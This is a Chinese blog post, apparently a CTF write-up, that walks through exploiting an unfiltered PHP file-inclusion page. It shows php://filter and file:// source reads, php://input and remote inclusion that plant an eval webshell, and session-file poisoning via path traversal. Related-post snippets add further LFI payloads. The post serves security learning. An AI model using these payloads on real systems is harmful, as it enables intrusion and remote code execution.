java代码审计文件包含_代码审计--一道简单的文件包含题目的多种利用方式

最新推荐文章于 2024-05-18 14:14:07 发布
最新推荐文章于 2024-05-18 14:14:07 发布
阅读量578 收藏 1
点赞数
文章标签: java代码审计文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28689507/article/details/114958924
版权

不知出自哪次CTF

前言:

本萌新最近在学习代码审计,

有一天在水群聊到代码审计如何学习,

然后某dalao丢给我一道题,说你对这题有什么看法,

本萌新一看,这不是很简单吗,想也没多想就直接上去?file=flag.php,

然后被dalao指教了一番,于是就有了这篇文章。

目录:

NO.1 传统方法

首先来看下代码

error_reporting(0);

if(@isset($_GET["file"])){

include($_GET["file"]);

}else{

highlight_file(__FILE__);

phpinfo();

}

?>

看完代码后再来学习学习函数吧,毕竟菜啊!!!

isset()函数检测变量是否设置,是返回true,否则返回false

语法:bool isset( mixed var [, mixed var [, …]] )

error_reporting()函数能够在运行时设置 error_reporting 指令。0为关闭错误报告

语法:error_reporting(level)

include 函数包含并运行指定文件。

这个应该大家都很熟悉了。

highlight_file()函数对文件进行语法高亮显示。

语法:highlight_file(filename,return)

参数:

filename 必需。要进行高亮处理的 PHP 文件的路径。

return 可选。如果设置 true,则本函数返回高亮处理的代码。

这题由于没有任何过滤,利用起来并不困难,

直接访问的时候会出现phpinfo,可能是为了方便让你知道网站路径吧,

知道路径后,当然一般直接使用?file=xxx就可以直接利用了。

NO.2 php伪协议

对于php伪协议,网上也有很多的文章,

但是对于萌新来说,自己再总结学习一下自然不是什么坏事,

谈到伪协议就不得不先说allow_url_fopen和allow_url_include这两个函数。

allow_url_fopen函数:默认值是ON,允许url里的封装协议访问文件

allow_url_include函数:默认值是OFF,不允许包含url里的封装协议包含文件

接下来看看CTF中几个常用的伪协议。

1. php://filter

php://filter协议在CTF中经常出现,通常配合base64来读取源码,

参数:

名称:

resource= 这个参数是必须的。它指定了你要筛选过滤的数据流。要过滤的数据流>

read= 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。读链的筛选列表>

write= 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。写链的筛选列表>

任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

这道题中利用方法也很简单,

http://localhost/include.php?file=php://filter/read=convert.base64-encode/resource=flag.txt

也很好理解,意思就是读取flag.txt的内容,进行base64编码后输出

注意:像这样的话是读取相同路径下的文件,就是include.php和flag.txt同路径

8ea1819253ea542c1cebd06a3b88540a.png

接下来看看跟php://filter很像的一个协议

file://协议(不是伪协议)

说明: file:// — 访问本地文件系统

file://协议会受到 allow_url_fopen 的影响,

但是在CTF中通常用来读取本地文件而不会受到allow_url_fopen的影响

用法: file:// [文件的绝对路径和文件名]

然后在这道题中就可以这样去构造,

http://localhost/include.php?file=file://D:\phpStudy\PHPTutorial\WWW\flag.txt

在Windows下正反斜杆都可以使用,

Linux下必须使用正斜杆(/)

d3536634df1f26077dd6aecb94ad26a9.png

当然还可以配合php://filter协议使用,

http://localhost/include.php?file=php://filter/read=convert.base64-encode/resource=file://D:\phpStudy\PHPTutorial\WWW\flag.txt

2. php://input协议

说明:简单来说就是能够将post请求中的数据作为PHP代码执行

需要将allow_url_include开启

注:当enctype='multipart/form-data' 的时候 php://input 是无效的

测试:

a3cf9fd54b3d62a4e723469a4a9cb199.png

也可以post生成一句话

<?php fputs(fopen("shell.php","w"),'<?php eval($_POST['cmd']);?>');?>

先来认识下函数,

fputs()函数将内容写入一个打开的文件中。

语法:fputs(file,string,length)

参数:

file 必需。规定要写入的打开文件。

string 必需。规定要写入打开文件的字符串。

length 可选。规定要写入的最大字节数。

fopen()函数打开文件或者 URL。

语法:fopen(filename,mode,include_path,context)

参数:

filename 必需。规定要打开的文件或 URL。

mode 必需。规定要求到该文件/流的访问类型。可能的值见下表。

include_path 可选。如果也需要在 include_path 中检索文件的话,可以将该参数设为 1 或 TRUE。

context 可选。规定文件句柄的环境。Context 是可以修改流的行为的一套选项。

mode 参数的可能的值:

“r” 只读方式打开,将文件指针指向文件头。

“r+” 读写方式打开,将文件指针指向文件头。

“w” 写入方式打开,将文件指针指向文件头并将文件大小截为零。如果文件不存在则尝试创建之。

“w+” 读写方式打开,将文件指针指向文件头并将文件大小截为零。如果文件不存在则尝试创建之。

“a” 写入方式打开,将文件指针指向文件末尾。如果文件不存在则尝试创建之。

“a+” 读写方式打开,将文件指针指向文件末尾。如果文件不存在则尝试创建之。

“x” 创建并以写入方式打开,将文件指针指向文件头。如果文件已存在,返回 FALSE,如果文件不存在则尝试创建之。

“x+” 创建并以读写方式打开,将文件指针指向文件头。如果文件已存在,返回 FALSE,如果文件不存在则尝试创建之。

这句话的意思很明显了,以写入的方式将一句话写入到shell.php这个文件中,

然后就可以直接上菜刀了

ff0e278d44a848b90228286a3576b1d1.png

对于文件包含这个东西来说,文件后缀可以是任意的,

只要文件内容符合PHP语法规范,那么任何扩展名都可以被当作PHP来解析,

这里我们将shell.php改成shell.jpg的后缀,

菜刀路径的话也要换成包含的格式

http://localhost/include.php?file=shell.jpg

依旧是可以访问的,

好了,伪协议就说怎么多了。

NO.3 远程包含

既然是文件包含的题目,当然就离不开远程文件包含了,

远程包含需要目标服务器将allow_url_fopen和allow_url_include开启才可以。

现在将一匹马放到自己服务器上,然后远程包含这匹马,

注意,这里有个坑

这匹马的文件名不能是可以解析的文件后缀,比如php后缀可以解析,那么这匹马的后缀就不能是php

http://localhost/include.php?file=http://127.0.0.1/shell.jpg

但是如果我就想要包含php后缀的文件呢,当然也是可以的,

不过这里需要将一句话echo出来才行,这样才可以包含php后缀的文件

echo '<?php eval($_POST["cmd"]);?>';

?>

然后就可以利用了

8a38f325ea81c9a9c6d0e0c453be9f13.png

思考:为什么远程包含需要将一句话echo出来

原因是远程服务器已经将文件解析了,远程包含只包含前端显示的代码,跟后缀没什么关系,

所有这里为什么要echo一句话就是这个道理。

相反,本地包含就不需要在前端显示,只要是符合php规范的代码就可以,

本地包含一般使用jpg,log这样的后缀的一句话去绕waf。

远程包含还可以配合伪协议去利用,

将一句话进行base64加密,

26c5ca74f3c2839f82617ea252e4f3d7.png

注意:这里要是加密echo的一句话是不行的

然后伪协议中base64就要换成解密的了decode

使用方法:

http://localhost/include.php?file=php://filter/read=convert.base64-decode/resource=http://127.0.0.1/shell.php

65d24d31787e7284929484f5fa63cbe5.png

然后一样可以使用菜刀去连接

NO.4 session文件包含

这题我们稍微改动一下,增加一个session

session_start();

error_reporting(0);

if(@isset($_GET["file"])){

$_SESSION["username"]=$_GET["file"];

include($_GET["file"]);

}else{

highlight_file(__FILE__);

phpinfo();

}

?>

这里的话就是开启session,然后将传入的参数写入到session文件中。

这里我们传入一个名为flag的参数,

在浏览器中可以看到 phpsessid 在发送的请求的 cookie值,

d97cb8a6e623d08b338d263681798f68.png

然后我们可以通过phpinfo知道session存放的路径,

f264331bc8b56dcecf5de587b35a25d1.png

然后去文件夹中发现确实存在这个临时文件,

140a0de86575be52b9cace92efd5f202.png

然后进行读取,session临时文件格式为sess_xxx 发现是我们刚刚传入的flag字段

http://localhost/include.php?file=../tmp/tmp/sess_onkqtedht4iucf6bnnjpgqu0g7

96e67bcbf581fbc8aea28e2255e1c4c8.png

如果当我们传入的值为 <?php phpinfo();?> 会出现什么情况

651e2e4de135a868dee9cbfd6dc81f6c.png

好了。就说这么多了…

总结

首先真的挺感谢朋友们对我的支持,

学习过程中问了非常多的问题,

本文章难免会出现一些语句错误,如有发现还请多多指教,

最后呢,当然希望能够做一条会翻身的咸鱼了!!!

参考文献

https://www.freebuf.com/column/148886.html

http://www.cnblogs.com/Oran9e/p/8082962.html

http://www.php.net/

Tfifthe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件漏洞题目搜集
Devil_B的博客
05-14 643
百度杯”CTF比赛 2017 二月场 没错!就是文件包含漏洞。 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 题目内容: 没错!就是文件包含漏洞。 解题知识点: 文件包含:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时
Java代码审计文件包含
jameson_的专栏
06-12 2364
事件今天报一个文件包含,正常url:http://xx.xx.xx.com/view=f01 payload : http://xx.xx.xx.com/view=../../../../../../../../etc/passwd%00看了一下,问题代码如下。private String getFile(String tagId) { String path = getClass
【Basic】BUU LFI COURSE
最新发布
欢迎来到我的学习笔记薄
05-18 741
话不多说直接看题
java 文件包含_java文件包含漏洞
weixin_35591093的博客
02-15 2012
java文件包含分静态包含的动态包含两种:静态包含:动态包含:两者的区别我就不赘述了。就目前了解静态包含是不存在问题的,因为file的参数不能动态赋值而动态包含是存在问题的我们常说的php文件包含有本地文件包含和远程文件包含两种所以我分析java文件包含的时候也是分这两种情况1.本地文件包含:目前我对java的本地文件包含的理解为:造成的危害就只有文件读取,一般情况下是不能造成命令执行或代码执行...
java 包含文件_java 文件夹拷贝(文件夹里包含文件和文件夹) 代码
weixin_34052529的博客
02-15 136
java代码实现文件夹拷贝,文件夹可能包含文件夹和文件import java.io.BufferedReader;import java.io.File;import java.io.FileInputStream;import java.io.FileNotFoundException;import java.io.FileOutputStream;import java.io.IOExcept...
java代码审计文件包含_代码审计:dedecms本地文件包含及物理路径泄露0day[转]
weixin_35132022的博客
03-02 162
晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯)出现漏洞的两个文件为:Include/payment/alipay.phpInclude/payment/yeepay.php漏洞均出现在respond方法里,估计这两个文件是临时工写的。Incl...
fileTimeInfo_java_统计文件创建时间和修改时间_
10-02
Java编程语言中,文件操作是一项基础且重要的任务。标题"fileTimeInfo_java_统计文件创建时间和修改时间_"指的是一个Java程序,它用于获取指定目录下所有文件的创建时间(Creation Time)和最后修改时间(Last ...
代码审计 期末考试题卷(一)
06-20
代码审计 期末考试题卷(一)
java笔试题输出结果-VCG:VisualCodeGrepper-代码安全扫描工具
06-20
在这样的笔试题中,可能考察的是如何利用Java进行有效的代码分析和安全检查。 首先,我们要理解Java的基础知识。Java是一种面向对象的编程语言,它的核心特性包括封装、继承和多态。在笔试题中,可能会考察类、对象...
hsctf-2015:为 HSCTF 2015 撰写的文章
06-03
在CTF挑战中,Java可能涉及到的方面包括代码审计、漏洞利用、反编译和逆向工程等。理解类、对象、继承、多态性、异常处理、IO流、网络编程等核心概念是解决Java相关问题的基础。 2. **Java安全**:在HSCTF 2015中,...
ISCC2013.zip_网络编程_Java_
08-11
标题中的"ISCC2013.zip_网络编程_Java_"揭示了这个压缩包文件的主要内容,它聚焦于2013年ISCC(可能是某个网络安全或编程竞赛的缩写)的比赛资料,重点在于网络编程,并且使用了Java语言。描述部分提到"ISCC2013北京...
JAVA代码审计常用漏洞总结
12-11
主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑 可以是一个函数,或者是条小小的条件判断语句。 敏感函数参数回溯,根据敏感函数,逆向追踪参数传递的过程。这个方法是最高效,最常用 的方法。大多数漏洞的产生是因为函数的使用不当导致的,只要找到这些函数,就能够快速挖掘想要的漏洞。
文件包含练习1
qq_61109509的博客
02-07 962
大佬文章
文件包含题型
我了解豹女就像农民伯伯了解大米
06-27 195
可以看到有file关键词可以进行php伪协议: 使用file伪协议查看/etc/passwd ?file=file:///etc/passwd http://192.168.129.128:83/vulnerabilities/fu1.php?file=file:///etc/passwd 使用php://input伪协议去查看ls / ?file=php:input (Post Data) <?php phpinfo()?> http://192.168.129.1..
代码审计中的文件包含漏洞
weixin_30240349的博客
03-17 119
0x00 背景 文件包含漏洞是php语言的一大特性。文件包含的意思是,服务器在执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码并执行,这会为开发者节省大量的时间。而文件包含漏洞的出现在于服务器没有对要包含的来源文件进行审查,导致黑客进行了任意文件的读取甚至执行。本文以代码审计的形式研究文件包含漏洞的原理、挖掘形式、防御方案及缺陷。 0x01文件包含漏洞的产生原理 ...
WEB:题目名称-文件包含
sleepywin的博客
07-19 542
用 bp爆破,暴力破解 intruder 模块有个“cluster bomb” (集束炸弹)模式,可以把上面所有的 16 个字符集格式做一个笛卡尔积,生成 256(16 *16)个请求。",可以推测 "base64" 字符串在黑名单里。,比如 iconv("ASCII", "UTF-8", $string),也就是说。convert.iconv 相当于用了 iconv() 函数,这个函数是。,拿到数据之后,再把它的字符集转回来就行了。构造payload尝试读取flag.php。爆破完成后可发现flag。
文件包含漏洞三道题
qz362228的博客
05-04 1547
1.绕过require_once限制 题目页面: 有两个require_once,则this_is_flag.php已经被包含一次就不会再包含了。而题目意思就是说flag在this_is_flag.php文件中。所以要想绕过前面那个require_once,而执行后面那个。在浏览器中搜索绕过require_once限制 因为知道文件路径,所以最后是/www/html/file_include/Assess01/this_is_flag.php ?url=/proc/self/root/proc/self/r
南邮平台 文件包含漏洞题
qq_41497476的博客
05-24 415
当无法判断allow_url_fopen,allow_url_include的开启状态时,可逐一尝试如下的请求判断哪些能够执行 1.?file=data:text/plain,<?php phpinfo()?> 2.?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= 3.?file=php://input...
java 文件包含漏洞_远程文件包含漏洞(pikachu)
weixin_39987985的博客
03-05 2140
漏洞介绍File Inclusion(文件包含漏洞)概述文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:include(),include_once()require(),require_once()这些文件包含函数,这些函数在代码设计中被经常使用到。大多数情况下,文件包含函数中包含的代...
Java代码审计案例及修复
12-22
本文是关于Java代码审计案例及修复的内部使用文档。文档编号为Java-web-source-V1.0,严格保密。本文是由编写者(mmc)于2017年12月5日编写,仅适用于公司内部使用,不得用于任何商业活动。 在编写过程中,参照了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值